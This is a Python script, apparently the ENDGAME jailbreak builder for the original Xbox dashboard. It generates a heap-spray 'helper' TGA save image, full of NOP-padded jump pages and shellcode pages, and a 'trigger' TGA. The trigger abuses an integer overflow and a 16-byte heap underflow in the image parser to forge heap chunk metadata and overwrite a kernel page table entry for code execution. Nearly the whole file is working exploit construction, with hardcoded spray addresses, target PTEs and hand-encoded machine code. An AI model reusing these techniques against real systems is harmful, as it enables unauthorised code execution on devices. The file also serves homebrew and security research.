"""
Generate the ENDGAME 'helper' and 'trigger' save files.

Running this script assembles shellcode.asm with NASM, builds two TGA images
and writes them (with their TitleMeta.xbx files) under the ENDGAME/ directory.
"""

import os
import sys
import ctypes
import struct
import subprocess

try:
    import sim5960
    SIM_ENABLED = True
except ImportError:
    SIM_ENABLED = False

#------------------------------------------------------------------------------
# Util
#------------------------------------------------------------------------------

PAGE_SIZE = 0x1000
PTE_REGION = 0xc0000000

def pte_address(address):
    """
    Return the address of the PTE that maps the given virtual address.

    Each page (address >> 12) owns one 4-byte entry inside PTE_REGION. The
    page offset bits are discarded so the result is always 4-byte aligned,
    even when the given address is not page aligned.
    """
    return PTE_REGION | ((address >> 12) << 2)

def p32(value):
    """
    Pack value as an unsigned 32-bit little-endian integer.
    """
    # explicit '<' so the output does not depend on the host byte order
    return struct.pack("<I", value)

def p16(value):
    """
    Pack value as an unsigned 16-bit little-endian integer.
    """
    return struct.pack("<H", value)

#------------------------------------------------------------------------------
# Exploit
#------------------------------------------------------------------------------

BASE_PATH = os.path.dirname(__file__)
NASM_PATH = os.path.join(BASE_PATH, "nasm.exe")
ENDGAME_PATH = os.path.join(BASE_PATH, "ENDGAME")

#
# SPRAY_BASE represents the approximate memory address of where we expect our
# 8mb helper buffer to get decompressed and swizzled into memory.
#
# this buffer consists of two components of equal size that the exploit
# depends on to obtain arbitrary code execution. half is made up of 'jump
# pages' described later and the other half is shellcode pages.
#
# the *_MID variables should point approximately half way into each of the
# two regions. this allows for +/- 2mb of wiggle room based on how memory
# layout may drift a bit based on kernel, dash, or runtime discrepancies.
#
# the base address we hardcode was selected after scanning and dumping the
# exact address from the exploit running against several kernel and dash
# combinations. it should also be somewhat resilient to some amount of
# auxiliary 'navigation' around the dash prior to triggering ENDGAME.
#

SPRAY_BASE = 0xF271B000
SPRAY_JUMP_MID = SPRAY_BASE + 0x200000
SPRAY_PAYLOAD_MID = SPRAY_BASE + 0x600000

#
# these two addresses represent the pages that we hope to 'sinkhole' by way of
# PTE corruption. by manipulating their underlying PTEs, we are able to make
# these point at entirely different pages in memory.
#
# the kernel page was hand selected based on reviewing the commonality between
# retail kernels and basic runtime testing. the second PTE we corrupt is
# mostly arbitrary but must be under the code selector limit (end of kernel)
#

TARGET_KERN_PAGE = 0x80022000
TARGET_XBEH_PAGE = 0x11000

TARGET_KERN_PTE = pte_address(TARGET_KERN_PAGE) # 0xc0200088
TARGET_XBEH_PTE = pte_address(TARGET_XBEH_PAGE) # 0xc0000044

def _nop_pad_page(payload):
    """
    Return one PAGE_SIZE page of NOPs (0x90) that ends with the given payload.

    Raises ValueError if the payload is larger than a page, since it would
    otherwise have to be truncated.
    """
    if len(payload) > PAGE_SIZE:
        raise ValueError(
            f"Payload is 0x{len(payload):X} bytes, "
            f"but must fit in a 0x{PAGE_SIZE:X} byte page"
        )
    return b"\x90" * (PAGE_SIZE - len(payload)) + bytes(payload)

def _write_save(title_dir, slot, title_name, tga_data):
    """
    Write TitleMeta.xbx and SaveImage.xbx for one title under ENDGAME_PATH.

    The SaveImage is written to ENDGAME/<title_dir>/<slot>/ and the TitleMeta
    to its parent directory, ENDGAME/<title_dir>/.
    """
    save_dir = os.path.join(ENDGAME_PATH, title_dir, slot)
    os.makedirs(save_dir, exist_ok=True)

    # TitleMeta is UTF-16-LE text prefixed with a byte order mark
    with open(os.path.join(save_dir, "..", "TitleMeta.xbx"), "wb") as f:
        f.write(b"\xFF\xFE" + f"TitleName={title_name}\r\n".encode("utf-16-le"))

    with open(os.path.join(save_dir, "SaveImage.xbx"), "wb") as f:
        f.write(tga_data)

def compile_shellcode(shellcode_filepath, debug=False):
    """
    Compile the shellcode at the given path and return its bytes.

    NASM is invoked on the given .asm file (with -dDEBUG when debug is set)
    and the result is read from the same path without its extension. On an
    assembler failure the error output is printed and the script exits with
    status 1. Raises ValueError if the path does not end with '.asm'.
    """
    if not shellcode_filepath.endswith(".asm"):
        raise ValueError("Shellcode path must end with '.asm'")

    # Run nasm.exe and capture the output and errors
    command = [NASM_PATH, shellcode_filepath]
    if debug:
        command.insert(1, "-dDEBUG")

    print("[*] Assembling shellcode... ", end="", flush=True)
    result = subprocess.run(command, capture_output=True)

    # the command failed, print the error and exit the script
    if result.returncode != 0:
        print("[-] Failed to compile shellcode...")
        print(result.stderr.decode(errors="replace"))
        sys.exit(1)

    output = result.stdout.decode(errors="replace")
    if output.strip():
        print(output)

    print("done")

    # read the compiled shellcode from file and return it
    shellcode_bin_filepath, _ = os.path.splitext(shellcode_filepath)
    with open(shellcode_bin_filepath, "rb") as f:
        return f.read()

def make_helper(compress, debug):
    """
    Generate the ENDGAME helper files (effectively a heap spray).

    compress selects whether the image data is run-length encoded, and debug
    is forwarded to compile_shellcode(). Raises ValueError if the compiled
    shellcode does not fit within a single page.
    """
    PTE_VALUE = SPRAY_PAYLOAD_MID & 0xFFFFF000
    PTE_VALUE |= 0x63 # (Accessed | Dirty | Valid | Writable)

    #
    # the jump (page) payload should be as small as possible (byte-wise) in an
    # effort to minimize the chance that naturally occurring calls into the
    # kernel (within this page) land on anything but one of our NOP's
    #
    # ideally we want to setup a safer region of memory and get off this page
    # as fast as possible. we do this by corrupting a second PTE that should
    # be within the code selector limit (thus, executable) and unused
    #

    jump_payload = b""

    # corrupt XBE header PTE
    jump_payload += b"\xB8" + p32(TARGET_XBEH_PTE)    # mov eax, TARGET_XBEH_PTE
    jump_payload += b"\xC7\x00" + p32(PTE_VALUE)      # mov DWORD PTR [eax], PTE_VALUE

    # jump to shellcode
    jump_payload += b"\x68" + p32(TARGET_XBEH_PAGE)   # push target
    jump_payload += b"\x0F\x01\x3C\x24"               # invlpg [esp]
    jump_payload += b"\xC3"                           # ret

    #
    # Construct the full jump page + payload. a specific kernel .text PTE will
    # be corrupted to point at one of these precisely aligned jump pages.
    #
    # the jump payload is aligned to the end of the jump page
    #

    jump_page = bytearray(_nop_pad_page(jump_payload))
    assert len(jump_page) == PAGE_SIZE

    #
    # because of the nature of heap unlink, a 4 byte value will get written
    # into one of our jump pages, specifically at the memory address:
    #
    #     PTE_VALUE = ADDR_TRAMPOLINE & 0xFFFFF000
    #     PTE_VALUE |= 0x61
    #     PTE_VALUE += 0x4
    #     ...
    #     *PTE_VALUE = 0xYYYYYYYY
    #
    # we insert a 0xB8 byte into the jump page, creating a simple but safe
    # no-op 'mov eax, 0xYYYYYYYY' instruction within the page's NOP-sled for
    # the off chance we land within the anomalous page
    #

    jump_page[0x64] = 0xB8

    # replicate the completed single page across a 4mb block of memory
    jump_block = jump_page * 0x400
    assert len(jump_block) == 0x400000

    #
    # the shellcode page represents the phase of ENDGAME which equates to
    # fully unconstrained execution.
    #
    # in the current exploit structure, the shellcode must fit within
    # 4096 bytes. this is ample for doing cleanup / repair of the memory
    # space or further bootstrapping.
    #
    # the following logic will compile ENDGAME's shellcode with NASM and
    # return the resulting bytes.
    #

    shellcode_filepath = os.path.join(BASE_PATH, "shellcode.asm")
    shellcode = compile_shellcode(shellcode_filepath, debug)

    #
    # prefix the compiled shellcode (which *must* be position independent)
    # with NOP's to construct a full page, with the shellcode aligned to the
    # end of the page. oversized shellcode is rejected rather than truncated.
    #

    shellcode_page = _nop_pad_page(shellcode)
    assert len(shellcode_page) == PAGE_SIZE

    # replicate the completed single page across a 4mb block of memory
    shellcode_block = shellcode_page * 0x400
    assert len(shellcode_block) == 0x400000

    #
    # construct the full helper blob. this represents exactly what we hope to
    # see in memory once our texture has been fully decompressed and swizzled
    #
    # when debugging ENDGAME or researching this exploit, you can locate this
    # buffer in memory using the following WinDbg command:
    #
    #     kd> s F0000000 L08000000 41 51 61 71
    #

    full = b""
    full += b"\x41\x51\x61\x71"     # marker DWORD for debug / mem searching
    full += jump_block[4:]          # 4mb of jump pages
    full += shellcode_block         # 4mb of shellcode pages
    assert len(full) == (0x800000), f"Actual len 0x{len(full):X}"

    #
    # when being processed and loaded by the dashboard, our helper blob will
    # get SWIZZLED (as it is technically a d3d texture)... so we have to
    # preemptively UN-SWIZZLE it here.
    #
    # It's an 0x400 x 0x800 x 4 texture (so, 8mb).
    #

    print("[*] Un-swizzling payload... ", end="", flush=True)
    unswiz_data = unswizzle32(full, 0x400, 0x800)
    print("done")

    #
    # the TGA format allows for run-length encoding of its data, so for fun
    # we actually compress our un-swizzled buffer to reduce its physical size
    # by over 10x (8mb --> 750kb) -- this ensures it should fit on any MU.
    #

    if compress:
        print("[*] Compressing payload... ", end="", flush=True)
        final_data = rle_compress(unswiz_data, 0x400)
        print("done")
    else:
        final_data = unswiz_data

    #
    # for the purpose of this helper buffer/texture, we don't need to do
    # anything buggy. simply create a TGA of the proper dimensions, with
    # simple "top to bottom" and "left to right" properties
    #

    tga_data = make_tga(0x400, 0x800, 4, final_data, 0x28, compress)

    # optionally validate the image with the simulator, when it is installed
    if SIM_ENABLED:
        loader = sim5960.LoadTGA()
        status, _, parsed = loader.run(tga_data)
        print(f"[*] Valid? {status == 0}, data left over... 0x{parsed:X}")
        if status:
            print(f"[-] FAIL: {status:08X}")
            # raised explicitly so the check survives 'python -O'
            raise AssertionError(f"LoadTGA simulation failed: {status:08X}")

    #
    # write the exploit "helper" files to disk. note that this SaveImage must
    # belong to a game title of alphabetical priority higher than the "trigger"
    # files. this ensures the dash maps our helper into memory first.
    #

    print("[*] Saving helper files... ", end="", flush=True)
    _write_save("helper", "0", "HELPER", tga_data)

    # all done
    print("done")

def make_trigger():
    """
    Generate the ENDGAME trigger files.
    """
    PTE_VALUE = SPRAY_JUMP_MID & 0xFFFFF000
    PTE_VALUE |= 0x61 # (Accessed | Dirty | Valid)

    #
    # ENDGAME abuses an integer overflow in the allocation and processing of
    # TGA (image) files, enabling several powerful heap primitives.
    #
    # this is combined with TGA's 'bottom to top' image flag to perform a
    # 16-byte heap underflow, precisely corrupting the chunk's heap metadata
    # to setup a pretty traditional unlink-style write4 primitive.
    #
    # to make ENDGAME kernel and dash agnostic, it precisely targets the PTE
    # for a kernel .text page (kudos to mborgerson for the inspiration) as a
    # generic means of obtaining code execution from a single arbitrary write.
    #

    payload = b""

    # this block overwrites the heap metadata (the 16 byte underflow)
    payload += p16(0x0001)              # -0x10 - Size
    payload += p16(0x0000)              # -0x0E - Previous size
    payload += b"\x00"                  # -0x0C - Segment index
    payload += b"\x00"                  # -0x0B - Flags
    payload += b"\x00"                  # -0x0A - Index
    payload += b"\x00"                  # -0x09 - Mask
    payload += p32(0x44444444)          # -0x08
    payload += p32(0x45454545)          # -0x04

    # this block will be at the start of our heap allocation (a fake chunk)
    payload += p16(0x1000)              # -0x10 - Size
    payload += p16(0x4343)              # -0x0E - Previous size
    payload += b"\x00"                  # -0x0C - Segment index
    payload += b"\x00"                  # -0x0B - Flags
    payload += b"\x00"                  # -0x0A - Index
    payload += b"\x00"                  # -0x09 - Mask
    payload += p32(PTE_VALUE)           # -0x08 - ENDGAME write value
    payload += p32(TARGET_KERN_PTE)     # -0x04 - ENDGAME write address

    #
    # trigger info
    #
    #   - tga.width          = 0x8002
    #   - tga.height         = 0xFFFD
    #   - tga.img_depth      = 2 (bytes, or 16bits)
    #   - tga.img_descriptor = 8 (bottom to top, left to right)
    #
    #  (0x8002 * 0xFFFD * 2) = 0x10000FFF4
    #
    # NOTE: since we do not provide a sufficient amount of data to load a
    # complete image, the dash's TGA parsing logic fails and will immediately
    # free our corrupted chunk setting the full exploit into motion
    #

    tga_data = make_tga(0x8002, 0xFFFD, 2, payload, 8, False)

    #
    # write the exploit "trigger" files to disk. note that this SaveImage must
    # belong to a game title of alphabetical priority lower than the "helper"
    # files. this ensures the dash triggers the exploit at the correct time
    #

    print("[*] Saving trigger files... ", end="", flush=True)
    _write_save("trigger", "1", "TRIGGER", tga_data)

    # all done
    print("done")

#------------------------------------------------------------------------------
# DirectX (special thanks to xbox7887)
#------------------------------------------------------------------------------

def generate_swizzle_masks(width, height):
    """
    Generate bit masks for swizzling based on the given dimensions.

    Returns an (x_mask, y_mask) tuple. The address bits are handed out
    alternately to x and y, starting with x, until a dimension runs out of
    bits. Raises ValueError unless both dimensions are powers of 2.
    """
    if not (width > 0 and (width & (width - 1)) == 0):
        raise ValueError("Width must be a power of 2")
    if not (height > 0 and (height & (height - 1)) == 0):
        raise ValueError("Height must be a power of 2")

    x, y = 0, 0
    bit, mask_bit = 1, 1

    # 'bit' walks the coordinate bits, 'mask_bit' walks the address bits
    while bit < width or bit < height:
        if bit < width:
            x |= mask_bit
            mask_bit <<= 1
        if bit < height:
            y |= mask_bit
            mask_bit <<= 1
        bit <<= 1

    return x, y

def fill_swizzle_pattern(pattern, value):
    """
    Apply swizzle pattern to a given value for address calculation.

    The bits of value (lowest first) are deposited into the set bit positions
    of pattern (lowest first). Raises ValueError if value has bits left over
    once the pattern is exhausted, instead of looping forever.
    """
    result = 0
    bit = 1

    while value != 0:

        # no set bits remain in the pattern, so value can never be consumed
        if bit > pattern:
            raise ValueError("Value does not fit in the swizzle pattern")

        # a bit of value is only consumed when the pattern provides a slot
        if pattern & bit:
            if value & 1:
                result |= bit
            value >>= 1

        bit <<= 1

    return result

def unswizzle32(data, width, height):
    """
    Convert swizzled buffer to linear format for 32-bit pixels.

    Returns a bytes object of the same length as data. Raises ValueError if
    data holds fewer than width * height 4-byte pixels.
    """
    mask_x, mask_y = generate_swizzle_masks(width, height)

    required = width * height * 4
    if len(data) < required:
        raise ValueError(
            f"Expected at least 0x{required:X} bytes of pixel data, "
            f"got 0x{len(data):X}"
        )

    dst_buf = bytearray(len(data))

    # the x contribution is identical for every row, so compute it only once
    src_x_offsets = [fill_swizzle_pattern(mask_x, x) * 4 for x in range(width)]

    for y in range(height):
        src_y_offset = fill_swizzle_pattern(mask_y, y) * 4
        dst_offset = width * y * 4
        for src_x_offset in src_x_offsets:
            src_offset = src_y_offset + src_x_offset
            dst_buf[dst_offset:dst_offset+4] = data[src_offset:src_offset+4]
            dst_offset += 4

    return bytes(dst_buf)

#------------------------------------------------------------------------------
# Truevision TGA
#------------------------------------------------------------------------------

class TGAHeader(ctypes.LittleEndianStructure):
    """
    The 18-byte TGA file header.

    The structure is packed and explicitly little-endian, and all single-byte
    fields are unsigned so values of 0x80 and above read back unchanged.
    """
    _pack_ = 1
    _fields_ = [
        ("id_len", ctypes.c_ubyte),
        ("color_map_type", ctypes.c_ubyte),
        ("img_type", ctypes.c_ubyte),
        ("color_map_ofs", ctypes.c_ushort),
        ("num_color_map", ctypes.c_ushort),
        ("color_map_depth", ctypes.c_ubyte),
        ("x_offset", ctypes.c_ushort),
        ("y_offset", ctypes.c_ushort),
        ("width", ctypes.c_ushort),
        ("height", ctypes.c_ushort),
        ("img_depth", ctypes.c_ubyte),
        ("img_descriptor", ctypes.c_ubyte),
    ]

    @property
    def top_to_bottom(self):
        # bit 5 of the descriptor is set for top-to-bottom images
        return (self.img_descriptor & 0x20) == 0x20

    @property
    def left_to_right(self):
        # bit 4 of the descriptor is clear for left-to-right images
        return (self.img_descriptor & 0x10) != 0x10

    @property
    def compressed(self):
        # bit 3 of the image type marks run-length encoded data
        return bool(self.img_type & 0x08)

    def __str__(self):
        """
        Pretty-print the TGAHeader.
        """
        lines = ["TGAHeader - "]

        for field_name, _ in self._fields_:
            value = getattr(self, field_name)
            lines.append(f"{field_name.rjust(18, ' ')}: 0x{value:02X}")

            if field_name == "img_type":
                lines.append(f"      |--- compressed: {self.compressed}")

            if field_name == "img_descriptor":
                lines.append(f"      |- top_to_bottom: {self.top_to_bottom}")
                lines.append(f"      |- left_to_right: {self.left_to_right}")

        return "\n".join(lines)

def make_tga(width, height, depth=4, data=b"", descriptor=8, rle=True):
    """
    Initialize a TGA with the given properties and return its bytes.

    depth is given in bytes per pixel (1-4) and is stored in the header as a
    bit count. data is appended after the header as-is. Raises ValueError if
    width, height or depth is out of range.
    """
    if not (0 < width < 0x10000):
        raise ValueError("Invalid width")
    if not (0 < height < 0x10000):
        raise ValueError("Invalid height")
    if not (0 < depth < 5):
        raise ValueError("Invalid depth")

    tga = TGAHeader()

    # image type 2, with bit 3 set when the data is run-length encoded
    tga.img_type = 2
    tga.img_type |= (int(rle) << 3)

    tga.width = width
    tga.height = height
    tga.img_depth = (depth * 8)
    tga.img_descriptor = descriptor

    return bytes(tga) + data

def rle_compress(data, width):
    """
    Run-length encode (compress) the given data for a TGA image.

    data is treated as 4-byte pixels. Note that width is applied as a *byte*
    count: data is processed in windows of width bytes and no packet ever
    spans two windows. A repeated pixel becomes one run packet (header
    0x80 | extra repeats, at most 128 pixels) and any other pixel becomes a
    single-pixel raw packet (header 0).
    """
    depth = 4
    output = bytearray()

    for row_start in range(0, len(data), width):
        row_end = row_start + width
        offset = row_start

        while offset < row_end:
            pattern = data[offset:offset+depth]
            offset += depth

            # count how many additional times the pixel repeats (max 127)
            count = 0
            while offset < row_end and count < 127 and data[offset:offset+depth] == pattern:
                count += 1
                offset += depth

            output.append((0x80 | count) if count else 0)
            output += pattern

    return bytes(output)

#------------------------------------------------------------------------------
# Main
#------------------------------------------------------------------------------

def main(argc, argv):
    """
    Script main.

    Passing -d or --debug as the first argument builds a debug version.
    """

    # simple argument parsing / check to build a debug version of the exploit
    debug = argc > 1 and argv[1] in ["-d", "--debug"]

    # generate the ENDGAME exploit files
    print(f"[*] Generating ENDGAME v1.0{' (debug)' if debug else ''} exploit files -- by Markus Gaasedelen & shutterbug2000")
    make_helper(True, debug)
    make_trigger()
    print("[+] Success, exploit files available in ENDGAME/ directory")

if __name__ == "__main__":
    main(len(sys.argv), sys.argv)